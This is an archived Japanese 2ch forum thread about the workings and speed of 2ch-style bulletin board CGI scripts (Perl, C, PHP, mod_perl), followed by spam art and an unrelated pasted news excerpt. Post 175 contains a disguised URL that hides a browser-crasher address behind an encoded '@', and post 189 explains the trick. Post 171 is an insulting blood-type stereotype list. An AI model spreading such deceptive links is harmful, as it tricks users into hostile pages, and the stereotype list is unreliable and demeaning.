>>74
鯖の台数間違ってるし。
訴訟で負けたりしてやばいから必死こいて広告張ってるんだと思われ。
>>66
read.cgiの呼び出しが主な負荷だと思います。
あと、2ch型の掲示板はファイルの入出力が多いんだよ。
例えば、書き込み(age)ひとつで
・SETTING.TXTを読んで書き込み内容が大きすぎないかなどをチェック
・多重投稿やアク禁のリストを読んでホストをチェック
・datファイルへのログ書き込み
・subject.txtを読んでレス件数を読む
・subject.txtの順序、レス数を更新して書き込む
・index.htmlを更新
・subback.htmlを更新
・携帯用index.html(i/index.html)の更新
・連続投稿のチェックなどのためIPの一部を保存
最低でもこれだけのことが行われているかと。
CGIで運営される2ちゃんねる
75nobodyさん
02/12/24 23:20ID:2kS8TiT17776
02/12/25 02:10ID:??? 検索かけたら、2ちゃん以外でも使ってるところがあるから、
どうなのかなと思ったので。
どうなのかなと思ったので。
78nobodyさん
02/12/25 11:59ID:??? >75
その程度のテキスト操作なんて1GHzオーバーの鯖にとっては屁でもないと思うんだがな、、、
実況が始まると重くなるのはやっぱりスクリプトの実装がどこかおかしいんじゃないかな
その程度のテキスト操作なんて1GHzオーバーの鯖にとっては屁でもないと思うんだがな、、、
実況が始まると重くなるのはやっぱりスクリプトの実装がどこかおかしいんじゃないかな
79nobodyさん
02/12/25 16:58ID:U7g6MD4O >>78
書き込みごとにportscanしてるし。
鯖が重い/荒れるのを規制するための処理でますます重くなっているのが
2chスクリプト。かなり悪循環。よってサーバスペックに頼る。
というかそれ以前に人おおすぎだから。
書き込みごとにportscanしてるし。
鯖が重い/荒れるのを規制するための処理でますます重くなっているのが
2chスクリプト。かなり悪循環。よってサーバスペックに頼る。
というかそれ以前に人おおすぎだから。
80nobodyさん
02/12/25 17:03ID:U7g6MD4O >>76
もとは2ちゃんねるオリジナルだけど、
各種2ちゃんねるブラウザから自分(作った)の掲示板に読み書きできるように
/test/read.cgi→読み
/test/bbs.cgi→書き
/borad/subject.txt→スレ一覧
/borad/dat/xxxxxxxxxx.dat→datファイル
というファイル構成とsubject.txtおよびdatのデータ構造、bbs.cgiのインタフェース(どういったデータをPOSTすればよいか)
はだいたい統一されてる。
詳しく知りたければ、【スレッド】2ch型掲示板 その7【フロート型】
http://pc.2ch.net/test/read.cgi/php/1040777088/
から各種スクリプト落として読め。
もとは2ちゃんねるオリジナルだけど、
各種2ちゃんねるブラウザから自分(作った)の掲示板に読み書きできるように
/test/read.cgi→読み
/test/bbs.cgi→書き
/borad/subject.txt→スレ一覧
/borad/dat/xxxxxxxxxx.dat→datファイル
というファイル構成とsubject.txtおよびdatのデータ構造、bbs.cgiのインタフェース(どういったデータをPOSTすればよいか)
はだいたい統一されてる。
詳しく知りたければ、【スレッド】2ch型掲示板 その7【フロート型】
http://pc.2ch.net/test/read.cgi/php/1040777088/
から各種スクリプト落として読め。
82nobodyさん
02/12/26 01:03ID:PXAk6NFb 2ちゃんとそっくりな掲示板を良く見るが、
あれって2ちゃんCGIのレプリカだったんだ
知らなかった
あれって2ちゃんCGIのレプリカだったんだ
知らなかった
83nobodyさん
02/12/26 09:26ID:bsg6nc19 cのread.cgiとperlのとはどの程度違いがでるのでしょうか。
84nobodyさん
02/12/26 11:55ID:??? >>82
2ちゃんのCGIは2ちゃんのUNIX版利用者達などが無償で提供したもの。
2ちゃんのものではない。
レプリカとちょっと違う。
あめぞうタイプを2ちゃんが真似し、
それらを真似したもの。
多くはソース的に全く別。
2ちゃんのCGIは2ちゃんのUNIX版利用者達などが無償で提供したもの。
2ちゃんのものではない。
レプリカとちょっと違う。
あめぞうタイプを2ちゃんが真似し、
それらを真似したもの。
多くはソース的に全く別。
86nobodyさん
02/12/26 11:56ID:??? あ、bbs.cgi等は2ちゃんのもの。
90nobodyさん
02/12/26 12:12ID:??? 0chサンプルに入れるのやめてください。藁。
設置できなかったし。
megaとかアッハンとか♪とかは、2chsuexecぐらいなのかなあ?
2ch suexecってcの奴?
設置できなかったし。
megaとかアッハンとか♪とかは、2chsuexecぐらいなのかなあ?
2ch suexecってcの奴?
9185
02/12/26 12:12ID:??? あ 書いて無いや 書き忘れかな?
確かどこかのスレで書いてあったよ
確かどこかのスレで書いてあったよ
92nobodyさん
02/12/26 12:13ID:??? 0chを馬鹿にするな。2000件以上表示すればほとんど同じや。
94nobodyさん
02/12/26 12:16ID:bsg6nc19 age
95nobodyさん
02/12/26 12:21ID:??? >>89
ということは mod_perlならCに対抗しうえるってこと?
少ない件数なら mod_perlのほうが圧倒的に速いし
ログファイルが大きくなっても多少速度は落ちるが
ましなレベルだし
というか0chってそこまで遅いのか?
他のが1000件表示するのより遅い50件表示だし
ということは mod_perlならCに対抗しうえるってこと?
少ない件数なら mod_perlのほうが圧倒的に速いし
ログファイルが大きくなっても多少速度は落ちるが
ましなレベルだし
というか0chってそこまで遅いのか?
他のが1000件表示するのより遅い50件表示だし
02/12/26 12:28ID:???
mod_phpってmod_perlと同じぐらいのはずなのだが2倍違うぞ。
http://sugachan.dip.jp/download/read.php
http://sugachan.dip.jp/download/read.php
97nobodyさん
02/12/26 12:43ID:??? 急にアクセス数が増えたんでビクーリ
うちがもともと使ってたんで0chが入ってます
googleに襲われて瀕死状態になったんで
自分で書いてみますた。
数字は89の通りabの結果です 2chのはC
書き忘れてました。
mod_phpが一番最初で2倍違うのはコーディングの差かもしれませんが
件数多くなると0chと同様になるのはどうかと
PHPAが5〜10倍速くなる謳い文句なので暇があれば試してみようと思います
以前に♪とさぼーる?はmod_perlで動くようなので試してみました
まぁ似たようなモンですがうちのやつの3〜7割減くらいでしょうかね
S-JISの破損チェックとかはずせば多少は速度上がると思います
#実際には機能してなさそうなんでうちでは外しちゃった
Cでfastcgiが速いっぽいけどうちはmod_perlでいいや
うちがもともと使ってたんで0chが入ってます
googleに襲われて瀕死状態になったんで
自分で書いてみますた。
数字は89の通りabの結果です 2chのはC
書き忘れてました。
mod_phpが一番最初で2倍違うのはコーディングの差かもしれませんが
件数多くなると0chと同様になるのはどうかと
PHPAが5〜10倍速くなる謳い文句なので暇があれば試してみようと思います
以前に♪とさぼーる?はmod_perlで動くようなので試してみました
まぁ似たようなモンですがうちのやつの3〜7割減くらいでしょうかね
S-JISの破損チェックとかはずせば多少は速度上がると思います
#実際には機能してなさそうなんでうちでは外しちゃった
Cでfastcgiが速いっぽいけどうちはmod_perlでいいや
98nobodyさん
02/12/26 13:12ID:???101nobodyさん
02/12/26 13:49ID:??? rescue.ne.jp
$y0="Sunday"; $y1="Monday"; $y2="Tuesday"; $y3="Wednesday"; $y4="Thursday"; $y5="Friday"; $y6="Saturday";
$m0="Jan"; $m1="Feb"; $m2="Mar"; $m3="Apr"; $m4="May"; $m5="Jun"; $m6="Jul"; $m7="Aug"; $m8="Sep"; $m9="Oct"; $m10="Nov"; $m11="Dec";
@youbi = ($y0,$y1,$y2,$y3,$y4,$y5,$y6);
@monthg = ($m0,$m1,$m2,$m3,$m4,$m5,$m6,$m7,$m8,$m9,$m10,$m11);
なんですか これは(w
$y0="Sunday"; $y1="Monday"; $y2="Tuesday"; $y3="Wednesday"; $y4="Thursday"; $y5="Friday"; $y6="Saturday";
$m0="Jan"; $m1="Feb"; $m2="Mar"; $m3="Apr"; $m4="May"; $m5="Jun"; $m6="Jul"; $m7="Aug"; $m8="Sep"; $m9="Oct"; $m10="Nov"; $m11="Dec";
@youbi = ($y0,$y1,$y2,$y3,$y4,$y5,$y6);
@monthg = ($m0,$m1,$m2,$m3,$m4,$m5,$m6,$m7,$m8,$m9,$m10,$m11);
なんですか これは(w
102nobodyさん
02/12/26 15:58ID:???103nobodyさん
02/12/26 16:47ID:??? mod_2ch とか言ってみるテスト
104nobodyさん
02/12/26 17:25ID:Kdnv062P105nobodyさん
02/12/27 09:50ID:nGZAdmtB >>96
1000件で、PHPがPERLより4,5倍遅いのが気になるのですが。
400レス100KBと1000レス500KBというのが合ってなくて気になるのですが。
s1211の意味がよくわからなくて気になるのですが。
1000件で、PHPがPERLより4,5倍遅いのが気になるのですが。
400レス100KBと1000レス500KBというのが合ってなくて気になるのですが。
s1211の意味がよくわからなくて気になるのですが。
106nobodyさん
02/12/27 10:23ID:???107nobodyさん
02/12/27 19:16ID:KBaOTMBg 最近話題のrubyってどーよ
108nobodyさん
02/12/28 12:04ID:57gHkdnY >>107
最近話題?いつの話ですか?
最近話題?いつの話ですか?
109nobodyさん
02/12/28 16:29ID:MktvR+lh110_
02/12/28 16:41ID:iKPtCkKo114nobodyさん
02/12/29 01:05ID:apFJB7sH115nobodyさん
02/12/29 11:30ID:8mKV7jt/ CGIはオールアセンブラで書く。
これ最速だろう
これ最速だろう
117nobodyさん
02/12/29 14:01ID:ubkFpoNn forkのコスト
118111
02/12/29 15:42ID:FDozWzLm119nobodyさん
02/12/29 15:46ID:???120nobodyさん
02/12/29 16:21ID:ubkFpoNn121nobodyさん
02/12/29 16:54ID:??? 会員制にでもしないと転送量の問題は解決しないと思うけど。
122111
02/12/29 19:00ID:so+0Srgy123111
02/12/29 19:05ID:so+0Srgy124nobodyさん
02/12/29 19:31ID:??? 2ch型掲示板って、PHPとかPerlがほとんどなんですけど、
Javaとか他のApplicationServerでつくられたものはないんですか。
Javaとか他のApplicationServerでつくられたものはないんですか。
129111
02/12/29 21:25ID:kecuCvzv 感想とか書くのが筋ってもんじゃないのか?
130nobodyさん
02/12/29 21:46ID:??? >128
匿名掲示板(仮)なんかはruby使ってる。
匿名掲示板(仮)なんかはruby使ってる。
131にょ
02/12/30 16:41ID:FTARxBuo rubyって日本人が開発したんだよね
perl等と比べてどこが優れているのかな?
perl等と比べてどこが優れているのかな?
135111
02/12/30 20:57ID:PCO6CWoR 証明したんだからちゃんと覚えておけよ。
136nobodyさん
02/12/30 21:00ID:??? うるう秒をサポートしてなかった?
137nobodyさん
02/12/30 22:12ID:neFLd3GG >>131-134
オブジェクト指向で、爽快なプログラミングが楽しめます。
オブジェクト指向で、爽快なプログラミングが楽しめます。
138dd
02/12/30 22:23ID:??? バーカ
139dd
02/12/30 22:24ID:??? カス
140ddmか576mk
02/12/30 22:24ID:??? んjtmj7
141 D
02/12/30 23:27ID:??? だから言っただろ!言うだけならウンコ喰った口になるって!
142nobodyさん
02/12/30 23:55ID:??? 低脳が現れた
143nobodyさん
02/12/31 00:28ID:3To1/5EO 極端な話、CGIって
Webに送受信する機能のある開発環境なら
何でも良いんだろ?
VBとかDelphiとか使えば
高機能なCGIが簡単に作れるんじゃないのか?
スクリプト言語よりは実行速度早そうだし。
Webに送受信する機能のある開発環境なら
何でも良いんだろ?
VBとかDelphiとか使えば
高機能なCGIが簡単に作れるんじゃないのか?
スクリプト言語よりは実行速度早そうだし。
144nobodyさん
02/12/31 00:31ID:??? >>143
>Webに送受信する機能のある開発環境なら
ここ以外は正解。
環境変数にアクセスする機能
標準入力からデータを取り出せる機能
標準出力にデータを書き出せる機能
これだけあればいい。
後、なぜこの方法でもっとも一般的なCが引き合いに出されていないのか。
それと、2chスクリプトでもCでコーディングされている部分があると記憶。
>Webに送受信する機能のある開発環境なら
ここ以外は正解。
環境変数にアクセスする機能
標準入力からデータを取り出せる機能
標準出力にデータを書き出せる機能
これだけあればいい。
後、なぜこの方法でもっとも一般的なCが引き合いに出されていないのか。
それと、2chスクリプトでもCでコーディングされている部分があると記憶。
148nobodyさん
02/12/31 00:36ID:??? >>147
で。これまたソースはどこかにあるのか?
同じ機能をインタプリタとコンパイル済みコードで比較すると、どうしてもインタプリタの方が
速度は遅くなると思うんだが。
それとも、そんなにforkって重い?
で。これまたソースはどこかにあるのか?
同じ機能をインタプリタとコンパイル済みコードで比較すると、どうしてもインタプリタの方が
速度は遅くなると思うんだが。
それとも、そんなにforkって重い?
149nobodyさん
02/12/31 00:36ID:??? 中間コード@用はコンパイルされたものが
メモリ空間に常駐するから
高性能だって言うのなら
143試しに何か作ってくれ
メモリ空間に常駐するから
高性能だって言うのなら
143試しに何か作ってくれ
153nobodyさん
02/12/31 01:11ID:??? >>152
少しくらい調べてからしゃべった方が良いぞ。
.NETの1側面としてASP.NETと言うサーバサイドプログラミング環境で使用できる
言語を従来のJScipt/VBScriptのみから.NET系言語すべてに拡大させようという
もくろみがある。
少しくらい調べてからしゃべった方が良いぞ。
.NETの1側面としてASP.NETと言うサーバサイドプログラミング環境で使用できる
言語を従来のJScipt/VBScriptのみから.NET系言語すべてに拡大させようという
もくろみがある。
154nobodyさん
02/12/31 13:27ID:qLQW6luA だんだん話題が2ちゃんねるからはなれていくわけだが。
158nobodyさん
02/12/31 14:21ID:??? >>157
2chと言うシステムを2chスクリプトと呼んでるんじゃないの?
何でもかんでもサーバサイドプログラムならスクリプトって呼ぶ節もあるし。
そんな揚げ足取って遊んでる暇があったら内容についておもしろい反論した方が
スレのためだと思うぞ。
2chと言うシステムを2chスクリプトと呼んでるんじゃないの?
何でもかんでもサーバサイドプログラムならスクリプトって呼ぶ節もあるし。
そんな揚げ足取って遊んでる暇があったら内容についておもしろい反論した方が
スレのためだと思うぞ。
159111
02/12/31 15:17ID:??? まともな返事がないな。
証明しても認めないのか?
まぁいいさ。そのうちPerlの方が早いって噂がながれるから。
証明しても認めないのか?
まぁいいさ。そのうちPerlの方が早いって噂がながれるから。
160nobodyさん
02/12/31 17:35ID:??? とにかく143がDelphiでread.cgiつくって
それが他のより効率がよければ
一段落つく
それが他のより効率がよければ
一段落つく
161nobodyさん
02/12/31 20:53ID:qLQW6luA >>160
kylixでもいいよ。
kylixでもいいよ。
162nobodyさん
02/12/31 21:37ID:4SuLYxmx163nobodyさん
02/12/31 22:41ID:??? kylixって別に言語は決まっていないような・・・
165nobodyさん
02/12/31 22:46ID:??? Perlでいいじゃん。
終了
終了
166nobodyさん
02/12/31 22:52ID:??? Perlって言われてるほど遅くないよ
PHPって言われてるほど早くないよ・・・
マヂで
PHPって言われてるほど早くないよ・・・
マヂで
168nobodyさん
02/12/31 23:41ID:??? PHPにもPerlのモジュールのようなものってあるんでひょうか?
170nobodyさん
03/01/01 00:36ID:???171世直し一揆
03/01/02 11:17ID:T5fApRal <血液型A型の一般的な特徴>(見せかけの優しさ(偽善)に騙されるな!)
●とにかく気が小さい(神経質、臆病、二言目には「世間」)
●他人に異常に干渉する(しかも好戦的・ファイト満々でキモイ)
●自尊心が異常に強く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはたいてい、内面的・実質的に負けている)
●「常識、常識」と口うるさいが、実はA型の常識はピントがズレまくっている(日本の常識は世界の非常識)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者に弱く、弱い者には強い)
●あら探しだけは名人級(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため、性格がうっとうしい(根暗)
●一人では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、体裁をいつも気にしている(「世間体命」、「〜みたい」とよく言う)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度も言う、知障)
●表面上意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をし、ストレスを溜めておきながら、他人に猛烈に嫉妬する(不合理な馬鹿)
●執念深く、粘着でしつこい(「一生恨みます」タイプ)
●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。しかも冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(他人をけなして相対的に自分の立場を引き上げようとする等)
●とにかく気が小さい(神経質、臆病、二言目には「世間」)
●他人に異常に干渉する(しかも好戦的・ファイト満々でキモイ)
●自尊心が異常に強く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはたいてい、内面的・実質的に負けている)
●「常識、常識」と口うるさいが、実はA型の常識はピントがズレまくっている(日本の常識は世界の非常識)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者に弱く、弱い者には強い)
●あら探しだけは名人級(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため、性格がうっとうしい(根暗)
●一人では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、体裁をいつも気にしている(「世間体命」、「〜みたい」とよく言う)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度も言う、知障)
●表面上意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をし、ストレスを溜めておきながら、他人に猛烈に嫉妬する(不合理な馬鹿)
●執念深く、粘着でしつこい(「一生恨みます」タイプ)
●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。しかも冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(他人をけなして相対的に自分の立場を引き上げようとする等)
172nobodyさん
03/01/03 01:25ID:7wl3IpJo 伝説のように語られる
2001年8月の2ちゃん閉鎖危機。
その時、UNIX板の同志が2ちゃんのCGIを改良し
データを16分の1に圧縮してサーバ負荷を低減させたらしいけど
データってログファイルのことかな?
圧縮すればディスク容量は低減できるけど、サーバの負荷は増えるよね。
勘違いか。
あれって、結局何が原因だったのでしょうか。
2001年8月の2ちゃん閉鎖危機。
その時、UNIX板の同志が2ちゃんのCGIを改良し
データを16分の1に圧縮してサーバ負荷を低減させたらしいけど
データってログファイルのことかな?
圧縮すればディスク容量は低減できるけど、サーバの負荷は増えるよね。
勘違いか。
あれって、結局何が原因だったのでしょうか。
173nobodyさん
03/01/03 01:30ID:??? ログ読めば分かるけど、転送量ですよん。
当時はCPU負荷とかは問題ではなかったらしい。
今じゃそれで困ってるてのにねぇ…
当時はCPU負荷とかは問題ではなかったらしい。
今じゃそれで困ってるてのにねぇ…
174nobodyさん
03/01/03 03:32ID:??? 1/16って最高圧縮時だったような
175nobodyさん
03/01/03 12:40ID:WyHerT5Z http://game2.2ch.net|test|read.cgi|ff%40195.126.71.77/%63%72%61%73%68%6D%65
50 :ひろゆき★暫定管直人 :02/12/24 02:40 ID:nmrA0bMw
クリスマスは彼女としてきますよ。。。
50 :ひろゆき★暫定管直人 :02/12/24 02:40 ID:nmrA0bMw
クリスマスは彼女としてきますよ。。。
176nobodyさん
03/01/03 14:32ID:VDHGLCZs > CPU負荷
今ってどんなマシンなん?
今ってどんなマシンなん?
178nobodyさん
03/01/03 22:44ID:jx+nlJxM180nobodyさん
03/01/03 23:48ID:??? >>179
ttp://users72.psychedance.com/
の情報だと、
oyster14 が school2 の掲示板(食べ物 お菓子 ジュース 料理 ラーメン グルメ外食 B級グルメ お酒・Bar レシピ)全部、
oyster15 が food3 の掲示板(転職 資格全般 アルバイト 大学受験 お受験)全部、
ってなってるねぇ。
ttp://users72.psychedance.com/
の情報だと、
oyster14 が school2 の掲示板(食べ物 お菓子 ジュース 料理 ラーメン グルメ外食 B級グルメ お酒・Bar レシピ)全部、
oyster15 が food3 の掲示板(転職 資格全般 アルバイト 大学受験 お受験)全部、
ってなってるねぇ。
181nobodyさん
03/01/04 09:37ID:??? 鯖一台で結構持つんだな。
182nobodyさん
03/01/04 09:39ID:??? Pentium4-Xeon2GHzDualってことは
最近導入した機種だよな
最近導入した機種だよな
183nobodyさん
03/01/04 10:06ID:??? Pentium4-Xeon2GHzDualなのはほんの一部の機種だけで
他の大多数は、ジャンク寸前のボロ鯖の予感
他の大多数は、ジャンク寸前のボロ鯖の予感
184nobodyさん
03/01/04 10:36ID:??? ていうか、その鯖1台で、掲示板アプリ(PHPかPerlかしらんけど)と
データ(テキスト?)と、Web鯖(Apacheだろうけど)をまかなってんの?
すごいCPU負荷高そうだよねぇ。で、>>178のような高いスペックの鯖に
なっちゃうんか。。
DB鯖1台にスペックそこそこのAP鯖数台、同じくWeb鯖数台の方が
良いと思うのだが、予算とかラックスペースの問題があるんかな?
データ(テキスト?)と、Web鯖(Apacheだろうけど)をまかなってんの?
すごいCPU負荷高そうだよねぇ。で、>>178のような高いスペックの鯖に
なっちゃうんか。。
DB鯖1台にスペックそこそこのAP鯖数台、同じくWeb鯖数台の方が
良いと思うのだが、予算とかラックスペースの問題があるんかな?
185nobodyさん
03/01/04 17:18ID:K4CHI+pq186名無しさん@Emacs
03/01/05 07:45ID:9F5qi+Do189nobodyさん
03/01/05 15:47ID:??? >>186
%40ってのは@をURLエンコードしたもので、それの手前はユーザ名とパスワードになる。
ttp://homepage2.nifty.com/winfaq/c/network.html#109
実際のリンク先は%40以降で、行き先はブラクラ。
手前に2chのどこかを思わせる文字列をくっつけて踏む奴を増やそうって考えだと思われ。
まぁ、発祥は漏れも知らないけどね。
%40ってのは@をURLエンコードしたもので、それの手前はユーザ名とパスワードになる。
ttp://homepage2.nifty.com/winfaq/c/network.html#109
実際のリンク先は%40以降で、行き先はブラクラ。
手前に2chのどこかを思わせる文字列をくっつけて踏む奴を増やそうって考えだと思われ。
まぁ、発祥は漏れも知らないけどね。
190山崎渉
03/01/15 13:36ID:??? (^^)
191山崎渉
03/04/17 12:27ID:??? (^^)
192nobodyさん
03/04/17 12:34ID:9xDxcLAx ■ お手伝いさん募集中。。。
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=2095&KEY=1050545010
夜勤さんが助手を募集しているらしい。
来たれ猛者。
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=2095&KEY=1050545010
夜勤さんが助手を募集しているらしい。
来たれ猛者。
193nobodyさん
03/04/17 15:27ID:LThhm/4g 1へ
そんなに文句あるなら直訴でもしてみそ
そんなに文句あるなら直訴でもしてみそ
194山崎渉
03/04/20 06:03ID:??? ∧_∧
( ^^ )< ぬるぽ(^^)
( ^^ )< ぬるぽ(^^)
195山崎渉
03/05/22 02:09ID:??? ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
196山崎渉
03/05/28 17:17ID:??? ∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
197山崎 渉
03/07/15 11:17ID:???__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
198山崎 渉
03/08/02 02:35ID:??? ∧_∧
( ^^ )< ぬるぽ(^^)
( ^^ )< ぬるぽ(^^)
199ぼるじょあ ◆ySd1dMH5Gk
03/08/02 05:15ID:??? ∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
200名無しさん@お腹いっぱい
03/08/02 07:33ID:??? (σ・∀・)σ ゲッツ!
201山崎 渉
03/08/15 23:05ID:??? (⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
203nobodyさん
04/01/14 22:16ID:ap6LPDDM 2ちゃんはPHPにいこうしないの?
204nobodyさん
04/01/15 00:16ID:??? しないだろ。PHPも使われてはいるが
205nobodyさん
04/01/21 03:57ID:L2v8Eaor は?CのCGIだろ?
どうせApacheしか津川ねーんだから、mod_2chとかにすれば
負荷が激減するのに。
どうせApacheしか津川ねーんだから、mod_2chとかにすれば
負荷が激減するのに。
206nobodyさん
04/01/21 07:28ID:??? ひろゆきによればCだと書き換え大変だからヤダってことだったと思う
2chみたいな規模なら俺もApacheモジュールにしたらいいのにと思うけど
2chみたいな規模なら俺もApacheモジュールにしたらいいのにと思うけど
207nobodyさん
04/01/21 08:09ID:??? 今はどうか知らんけど、サーバ側に手を加えるわけにはいかんそうですよ。
208nobodyさん
04/01/21 08:10ID:??? 詳細は閉鎖危機の某UNIXスレだったかその辺りにあったような
209nobodyさん
04/01/21 16:07ID:??? PHPが使われてるのは規制関係だけ。
モジュール化は本7の脳内だけ。
モジュール化は本7の脳内だけ。
210nobodyさん
04/01/31 14:41ID:eRBhTKHm read.cgiもwrite.cgiもCだったけど、いつからPerlになったの???
ずいぶんきたねーソースだったけど、だからってPerlにするのは逝かれてる。
ずいぶんきたねーソースだったけど、だからってPerlにするのは逝かれてる。
211nobodyさん
04/02/07 05:56ID:??? 正直Perlなんて言語は2chを残して消えて欲しい
212nobodyさん
04/02/07 20:48ID:??? printf("正直%sなんて言語は%sを残して消えて欲しい", str1, str2);
213nobodyさん
04/02/13 20:46ID:nSy7JEwS エロイ人に質問
2ch は、perl とc でつくられているんでつか?
2ch は、perl とc でつくられているんでつか?
216nobodyさん
04/02/23 03:50ID:??? NG ワードです。
217nobodyさん
2005/11/26(土) 13:39:03ID:lGwtghir 20ヶ月ぶりにage
218nobodyさん
2007/01/16(火) 20:14:42ID:7zp3p3Gr もう2007年だぞ
219nobodyさん
2007/01/18(木) 21:50:27ID:kxyxPb6X 連続日付get
220http://fusianaさん.dqn.net/
2008/02/02(土) 11:45:46ID:??? | あべぽの時は近づいた。悔い改めて節穴を信じ、聖なる言葉「あべぽ」を唱えよ。 |
| あべぽ、板中のスレに一斉に節穴あべぽをして神のあべぽさを知らしめなさい。|
\ 聖なるAA(^^)はあべぽと山崎信者にのみ許される神のあべぽである。. /
\ /
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧_∧
( ^^ )
(っ) ,,,,l ` γ l,,,,,
\ \/~~.... |。 ~~ヽ
\,,/ | |。田}}\ \
| |。 | ヽ_ヽ
_ | |。 | ゝつ
|\  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
< guest ! あべぽ ! あべぽ ! >
∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
、 、 、 、 、
/っノ /っノ /っノ /っノ /っノ
/ / ∧_∧ / / ∧_∧ / / ∧_∧ / / ∧_∧ / / ∧_∧
\\( )\\( )\\( )\\( )\\(
| あべぽ、板中のスレに一斉に節穴あべぽをして神のあべぽさを知らしめなさい。|
\ 聖なるAA(^^)はあべぽと山崎信者にのみ許される神のあべぽである。. /
\ /
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
∧_∧
( ^^ )
(っ) ,,,,l ` γ l,,,,,
\ \/~~.... |。 ~~ヽ
\,,/ | |。田}}\ \
| |。 | ヽ_ヽ
_ | |。 | ゝつ
|\  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
< guest ! あべぽ ! あべぽ ! >
∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
、 、 、 、 、
/っノ /っノ /っノ /っノ /っノ
/ / ∧_∧ / / ∧_∧ / / ∧_∧ / / ∧_∧ / / ∧_∧
\\( )\\( )\\( )\\( )\\(
221nobodyさん
2011/08/28(日) 19:03:35.48ID:??? 自室にこもる孤独な努力
一度、パニックに陥ったコウ君に接したことがある。
自宅を訪ね、コウ君が大嫌いだというお笑い芸人に話題が及んだ時のことだ。なぜ嫌いな
の?軽い気持ちで尋ねた。コウ君は何度か言いよどんだ後、「言いたくない。うざい!」。
私に背を向け、フゥー、フゥー、と肩を大きく上下させた。両足が激しく震えている。
母親によると、その芸人が女装してふざけた歌を歌うのが、まじめなコウ君には許せない
らしい。朝からセミがうるさくてイライラも募っていた。何度も彼と会い、特性の一端を
知れば「そうか」と思う。それでも、突然の変容ぶりには戸惑った。
コウ君はスッと部屋を出て、10分ほどで落ち着きを取り戻して戻ってきた。真っ暗に消灯
した自室にこもっていたという。
「そうすれば落ち着くって、自分で考えた」という。怒ったら周りに迷惑がかかると思う
のだろうか。「そう思わなアカンやろ。ひたすら耐えてると周りが余計にうるさく感じる
から、一人の部屋がいいんや」。誰にも理解されない苦しみを制御しようと積み重ねた孤
独な努力を思い、せつない気持ちになる。
5月はじめ、中学校で最初のパニックを起こした。
男子が授業中に雑談していた。貧乏揺すりをし、息を荒くして耐えた。だが男子はコウ君
の貧乏揺すりと息づかいをまねてからかった。気持ちに余裕があれば無視もできた。だが
新学期以来のストレスで、堪忍袋はぱんぱんに膨れあがっていた。机をバーンとひっくり
返した。
コウ君はしばらく学校を休んだ。ようやく支援学級に復帰した5月末、再び「事件」。笑
